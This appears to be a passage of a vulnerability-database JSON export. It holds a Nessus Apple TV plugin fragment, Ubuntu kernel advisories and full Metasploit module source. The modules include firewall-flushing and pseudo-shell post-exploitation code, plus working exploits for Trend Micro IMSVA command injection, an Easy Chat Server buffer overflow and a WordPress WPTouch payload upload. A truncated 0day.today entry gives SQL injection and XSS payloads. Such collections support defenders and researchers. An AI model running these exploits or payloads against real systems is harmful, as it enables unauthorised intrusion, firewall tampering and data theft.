script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4653\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# fix\nfixed_build = \"13Y825\";\ntvos_ver = '9.2.2'; # for reporting purposes only\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-01-29T20:32:40", "bulletinFamily": "unix", "description": "It was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)", "modified": "2018-08-24T00:00:00", "published": "2018-08-24T00:00:00", "id": "USN-3753-1", "href": "https://usn.ubuntu.com/3753-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-29T20:33:07", "bulletinFamily": "unix", "description": "USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)", "modified": "2018-08-24T00:00:00", "published": "2018-08-24T00:00:00", "id": "USN-3753-2", "href": "https://usn.ubuntu.com/3753-2/", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-04-08T22:59:27", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.", "modified": "2019-01-24T17:22:19", "published": "2018-08-14T16:31:16", "id": "MSF:POST/LINUX/GATHER/ENUM_COMMANDS", "href": "", "type": "metasploit", "title": "Testing commands needed in a function", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'Testing commands needed in a function',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. It will check which commands are available in the system.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n register_options(\n [\n OptString.new('DIR', [false, 'Optional directory name to list, default current session path',''])\n ])\n end\n\n DIRS = [\n \"/root/local/bin/\",\n \"/usr/local/sbin/\",\n \"/usr/local/bin/\",\n \"/usr/sbin/\",\n \"/usr/bin/\",\n \"/sbin/\",\n \"/bin/\",\n \"/usr/local/go/bin/\"\n ]\n\n def run\n dir = datastore['DIR']\n binaries = []\n\n # Explore the $PATH directories\n path_dirs = cmd_exec(\"echo $PATH\").split(':')\n path_dirs.each do |d|\n elems = dir(d)\n path = pwd()\n elems.each do |elem|\n binaries.insert(-1, \"#{d}/#{elem}\")\n end\n end\n\n # Explore common directories with binaries:\n DIRS.each do |d|\n# if dir_exist?(d)\n elems = dir(d)\n path = pwd()\n elems.each do |elem|\n binaries.insert(-1, \"#{d}#{elem}\")\n end\n end\n\n # Busybox commands\n if command_exists?(\"busybox\")\n output = cmd_exec(\"busybox\")\n busybox_cmds = output.split(':')[-1].chomp.split(',')\n busybox_cmds.each do |cmd|\n binaries.insert(-1, \"busybox #{cmd}\")\n print_good(\"busybox #{cmd}\")\n end\n elsif command_exists?(\"/bin/busybox\")\n output = cmd_exec(\"(bin/busybox\")\n end\n\n# A recursive ls through the whole system could be added to find extra binaries\n\n binaries.uniq\n binaries.sort\n\n print_good(\"The following binaries/commands are available\")\n binaries.each do |bin|\n print_line(\"#{bin}\")\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_commands.rb"}, {"lastseen": "2019-04-23T11:00:08", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.", "modified": "2019-01-24T17:22:19", "published": "2018-07-12T12:16:22", "id": "MSF:POST/LINUX/MANAGE/IPTABLES_REMOVAL", "href": "", "type": "metasploit", "title": "IPTABLES rules removal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'IPTABLES rules removal',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n\n if command_exists?(\"iptables\")\n print_good(\"Deleting IPTABLES rules...\")\n cmd_exec(\"iptables -P INPUT ACCEPT\")\n cmd_exec(\"iptables -P FORWARD ACCEPT\")\n cmd_exec(\"iptables -P OUTPUT ACCEPT\")\n cmd_exec(\"iptables -t nat -F\")\n cmd_exec(\"iptables -t mangle -F\")\n cmd_exec(\"iptables -F\")\n cmd_exec(\"iptables -X\")\n print_good(\"iptables rules successfully executed\")\n else\n print_line(\"iptables rules could not be executed\")\n end\n if command_exists?(\"ip6tables\")\n print_good(\"Deleting IP6TABLES rules...\")\n cmd_exec(\"ip6tables -P INPUT ACCEPT\")\n cmd_exec(\"ip6tables -P FORWARD ACCEPT\")\n cmd_exec(\"ip6tables -P OUTPUT ACCEPT\")\n cmd_exec(\"ip6tables -t nat -F\")\n cmd_exec(\"ip6tables -t mangle -F\")\n cmd_exec(\"ip6tables -F\")\n cmd_exec(\"ip6tables -X\")\n print_good(\"ip6tables rules successfully executed\")\n else\n print_line(\"ip6tables rules could not be executed\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/manage/iptables_removal.rb"}, {"lastseen": "2019-04-26T14:51:37", "bulletinFamily": "exploit", "description": "This module will run a Pseudo-Shell.", "modified": "2019-01-24T17:22:19", "published": "2018-06-19T10:39:41", "id": "MSF:POST/LINUX/MANAGE/PSEUDO_SHELL", "href": "", "type": "metasploit", "title": "Pseudo-Shell Post-Exploitation Module", "sourceData": "\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'readline'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Unix\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Priv\n\nHELP_COMMANDS = [[\"help\", \"help\", 0, \"Show current help\"],\n [\"?\", \"help\", 0, \"Show current help\"],\n [\"ls\", \"dir\", 1, \"List files and folders in a directory\"],\n [\"cat\", \"read_file\", 1, \"Show file contents\"],\n [\"whoami\", \"whoami\", 0, \"Show current user\"],\n [\"cd\", \"cd\", 1, \"Change current directory\"],\n [\"users\", \"get_users\", 0, \"Show list of users\"],\n [\"groups\", \"get_groups\", 0, \"Show list of groups\"],\n [\"pwd\", \"pwd\", 0, \"Show current PATH\"],\n [\"interfaces\", \"interfaces\", 0, \"Show list of network interfaces\"],\n [\"path\", \"get_path\", 0, \"Show current directories included in $PATH enviroment variable\"],\n [\"macs\", \"macs\", 0, \"Show list of MAC addresses\"],\n [\"shell\", \"get_shell_name\", 0, \"Show current SHELL\"],\n [\"hostname\", \"get_hostname\", 0, \"Show current Hostname\"],\n [\"ips\", \"ips\", 0, \"Show list of current IP addresses\"],\n [\"isroot?\", \"is_root?\", 0, \"Show if current user has root permisions\"],\n [\"exit\", \"\", 0, \"Exit the Pseudo-shell\"],\n [\"tcp_ports\", \"listen_tcp_ports\", 0, \"Show list of listen TCP ports\"],\n [\"udp_ports\", \"listen_udp_ports\", 0, \"Show list of listen UDP ports\"],\n [\"clear\", \"clear_screen\", 0, \"Clear screen\"]].sort\n\nLIST = [].sort\nHELP_COMMANDS.each do |linea|\n LIST.insert(-1, linea[0])\nend\n\n def initialize\n super(\n 'Name' => 'Pseudo-Shell Post-Exploitation Module',\n 'Description' => %q{\n This module will run a Pseudo-Shell.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n @vhostname = get_hostname\n @vusername = whoami\n @vpromptchar = is_root? ? '#' : '$'\n prompt()\n end\n\n def parse_cmd(cmd)\n parts = cmd.split(' ')\n return '' unless parts.length >= 1\n cmd = parts[0]\n nargs = parts.length - 1\n HELP_COMMANDS.each do |linea|\n next unless linea[0] == cmd\n\n func = linea[1]\n if nargs >= 1\n if linea[2] == 1\n args = parts[1]\n else\n nargs = 0\n end\n else\n args = ''\n end\n\n return func, cmd, args, nargs\n end\n\n error = get_shell_name\n message = \"#{error}: #{cmd}: Command does not exist\\n\"\n print message\n message\n end\n\n def help()\n print \"\\n\"\n print \"Commands Help\\n\"\n print \"==============\\n\"\n print \"\\n\"\n printf(\"\\t%-20s%-100s\\n\", \"Command\", \"Description\")\n printf(\"\\t%-20s%-100s\\n\", \"-------\", \"-----------\")\n HELP_COMMANDS.each do |linea|\n printf(\"\\t%-20s%-100s\\n\", linea[0], linea[3])\n end\n print \"\\n\"\n end\n\n def prompt_show()\n promptshell = \"#{@vusername}@#{@vhostname}:#{pwd.strip}#{@vpromptchar} \"\n comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) }\n Readline.completion_append_character = \" \"\n Readline.completion_proc = comp\n input = Readline.readline(promptshell , true)\n return nil if input.nil?\n input\n end\n\n def prompt()\n while input = prompt_show\n break if input == \"exit\"\n break if input == \"exit \"\n begin\n func, command, args, nargs = parse_cmd(input)\n nargs = nargs.to_i\n if command == \"ls\"\n if nargs == 0\n nargs = nargs + 1\n ruta = pwd\n args = ruta\n end\n end\n if nargs > 0\n args = args.strip()\n resultado = public_send(\"#{func}\", \"#{args}\")\n else\n if input == \"\"\n resultado = []\n resultado.insert(-1,\"\")\n else\n resultado = public_send(\"#{func}\")\n end\n end\n if !!resultado == resultado\n if command == \"isroot?\"\n print resultado ? \"true\\n\" : \"false\\n\"\n end\n else\n if resultado.class == Array\n print resultado.join(\"\\n\")\n print \"\\n\"\n else\n if resultado.strip() != \"\"\n print resultado.chomp() + \"\\n\"\n end\n end\n end\n rescue # begin\n next\n end # begin\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/manage/pseudo_shell.rb"}, {"lastseen": "2019-03-27T01:21:16", "bulletinFamily": "exploit", "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user. The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.", "modified": "2017-10-10T06:37:24", "published": "2017-10-08T15:15:32", "id": "MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC", "href": "", "type": "metasploit", "title": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution\",\n 'Description' => %q{\n This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product\n have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which\n leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mr_me <mr_me@offensive-security.com>', # author of command injection\n 'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module\n ],\n 'References' =>\n [\n ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],\n ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 8445\n },\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'ConnectionType' => '-bind'\n },\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [[ 'Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => \"Oct 7 2017\",\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])\n ]\n )\n end\n\n def extract_jsessionid\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')\n })\n if res && res.code == 200 && res.body.include?('JSEEEIONID')\n res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last\n else\n nil\n end\n end\n\n def widget_auth(jsessionid)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),\n 'cookie' => \"CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}\"\n })\n if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')\n res.get_cookies\n else\n nil\n end\n end\n\n def check\n # If we've managed to bypass authentication, that means target is most likely vulnerable.\n jsessionid = extract_jsessionid\n if jsessionid.nil?\n return Exploit::CheckCode::Safe\n end\n auth = widget_auth(jsessionid)\n if auth.nil?\n Exploit::CheckCode::Safe\n else\n Exploit::CheckCode::Appears\n end\n end\n\n def exploit\n print_status('Extracting JSESSIONID from publicly accessible log file')\n jsessionid = extract_jsessionid\n if jsessionid.nil?\n fail_with(Failure::NotVulnerable, \"Target is not vulnerable.\")\n else\n print_good(\"Awesome. JSESSIONID value = #{jsessionid}\")\n end\n\n print_status('Initiating session with widget framework')\n cookies = widget_auth(jsessionid)\n if cookies.nil?\n fail_with(Failure::NoAccess, \"Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA\")\n else\n print_good('Session with widget framework successfully initiated.')\n end\n\n print_status('Trigerring command injection vulnerability')\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),\n 'cookie' => \"CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}\",\n 'vars_post' => {\n 'module' => 'modTMCSS',\n 'serverid' => '1',\n 'TOP' => \"$(python -c \\\"#{payload.encoded}\\\")\"\n }\n })\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb"}, {"lastseen": "2019-04-11T11:49:10", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.", "modified": "2017-07-24T13:26:21", "published": "2017-06-19T22:36:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EASYCHATSERVER_SEH", "href": "", "type": "metasploit", "title": "Easy Chat Server User Registeration Buffer Overflow (SEH)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',\n 'Description' => %q{\n This module exploits a buffer overflow during user registration in Easy Chat Server software.\n },\n 'Author' =>\n [\n 'Marco Rivoli', #Metasploit\n 'Aitezaz Mohsin' #POC\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '42155' ],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],\n ],\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'EXITFUNC' => 'thread',\n 'ENCODER' => 'x86/alpha_mixed'\n },\n 'DisclosureDate' => 'Oct 09 2017',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n sploit = rand_text_alpha_upper(217)\n sploit << \"\\xeb\\x06\\x90\\x90\"\n sploit << [target.ret].pack('V')\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(200)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(URI,'registresult.htm'),\n 'method' => 'POST',\n 'vars_post' => {\n 'UserName' => sploit,\n 'Password' => 'test',\n 'Password1' => 'test',\n 'Sex' => 1,\n 'Email' => 'x@',\n 'Icon' => 'x.gif',\n 'Resume' => 'xxxx',\n 'cw' => 1,\n 'RoomID' => 4,\n 'RepUserName' => 'admin',\n 'submit1' => 'Register'\n }\n })\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/easychatserver_seh.rb"}, {"lastseen": "2019-04-14T23:54:08", "bulletinFamily": "exploit", "description": "The WordPress WPTouch plugin contains an authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also uses its own file upload mechanism instead of the WordPress api it's possible to upload any file type. The user provided does not need special rights, and users with \"Contributor\" role can be abused.", "modified": "2017-09-08T15:04:47", "published": "2014-07-14T19:35:18", "id": "MSF:EXPLOIT/UNIX/WEBAPP/WP_WPTOUCH_FILE_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress WPTouch Authenticated File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'WordPress WPTouch Authenticated File Upload',\n 'Description' => %q{\n The WordPress WPTouch plugin contains an authenticated file upload\n vulnerability. A wp-nonce (CSRF token) is created on the backend index\n page and the same token is used on handling ajax file uploads through\n the plugin. By sending the captured nonce with the upload, we can\n upload arbitrary files to the upload folder. Because the plugin also\n uses its own file upload mechanism instead of the WordPress api it's\n possible to upload any file type.\n The user provided does not need special rights, and users with \"Contributor\"\n role can be abused.\n },\n 'Author' =>\n [\n 'Marc-Alexandre Montpas', # initial discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html'],\n ['WPVDB', '7118']\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' => [['wptouch < 3.4.3', {}]],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 14 2014'))\n\n register_options(\n [\n OptString.new('USER', [true, 'A valid username', nil]),\n OptString.new('PASSWORD', [true, 'Valid password for the provided username', nil])\n ])\n end\n\n def user\n datastore['USER']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def check\n check_plugin_version_from_readme('wptouch', '3.4.3')\n end\n\n def get_nonce(cookie)\n res = send_request_cgi(\n 'uri' => wordpress_url_backend,\n 'method' => 'GET',\n 'cookie' => cookie\n )\n\n # forward to profile.php or other page?\n if res && res.redirect? && res.redirection\n location = res.redirection\n print_status(\"Following redirect to #{location}\")\n res = send_request_cgi(\n 'uri' => location,\n 'method' => 'GET',\n 'cookie' => cookie\n )\n end\n\n if res && res.body && res.body =~ /var WPtouchCustom = {[^}]+\"admin_nonce\":\"([a-z0-9]+)\"};/\n return Regexp.last_match[1]\n else\n return nil\n end\n end\n\n def upload_file(cookie, nonce)\n filename = \"#{rand_text_alpha(10)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(payload.encoded, 'application/x-php', nil, \"form-data; name=\\\"myfile\\\"; filename=\\\"#{filename}\\\"\")\n data.add_part('homescreen_image', nil, nil, 'form-data; name=\"file_type\"')\n data.add_part('upload_file', nil, nil, 'form-data; name=\"action\"')\n data.add_part('wptouch__foundation__logo_image', nil, nil, 'form-data; name=\"setting_name\"')\n data.add_part(nonce, nil, nil, 'form-data; name=\"wp_nonce\"')\n post_data = data.to_s\n\n print_status(\"Uploading payload\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => wordpress_url_admin_ajax,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'cookie' => cookie\n )\n\n if res && res.code == 200 && res.body && res.body.length > 0\n register_files_for_cleanup(filename)\n return res.body\n end\n\n nil\n end\n\n def exploit\n print_status(\"Trying to login as #{user}\")\n cookie = wordpress_login(user, password)\n if cookie.nil?\n print_error(\"Unable to login as #{user}\")\n return\n end\n store_valid_credential(user: user, private: password, proof: cookie)\n\n print_status(\"Trying to get nonce\")\n nonce = get_nonce(cookie)\n if nonce.nil?\n print_error(\"Can not get nonce after login\")\n return\n end\n print_status(\"Got nonce #{nonce}\")\n\n print_status(\"Trying to upload payload\")\n file_path = upload_file(cookie, nonce)\n if file_path.nil?\n print_error(\"Error uploading file\")\n return\n end\n\n print_status(\"Calling uploaded file #{file_path}\")\n send_request_cgi(\n 'uri' => file_path,\n 'method' => 'GET'\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb"}], "zdt": [{"lastseen": "2018-01-04T11:06:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-01-26T00:00:00", "published": "2017-01-26T00:00:00", "href": "https://0day.today/exploit/description/26798", "id": "1337DAY-ID-26798", "title": "Movie Portal Script 7.36 - Multiple Vulnerabilities", "type": "zdt", "sourceData": "Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability\r\nGoogle Dork : -\r\nDate : 20/01/2017\r\nExploit Author : Marc Castejon <[email\u00a0protected]>\r\nVendor Homepage : http://itechscripts.com/movie-portal-script/\r\nSoftware Link: http://movie-portal.itechscripts.com\r\nType : webapps\r\nPlatform: PHP\r\nSofware Price and Demo : $250\r\n \r\n------------------------------------------------\r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/show_news.php\r\nVulnerable Parameters: id\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\r\n \r\n-----------------------------------------------\r\nType: Reflected XSS\r\nVulnerable URL: http://localhost/[PATH]/movie.php\r\nVulnerable Parameters : f=\r\nPayload:<img src=i onerror=prompt(1)>\r\n---------------------------------------------\r\nType: Error Based Sql 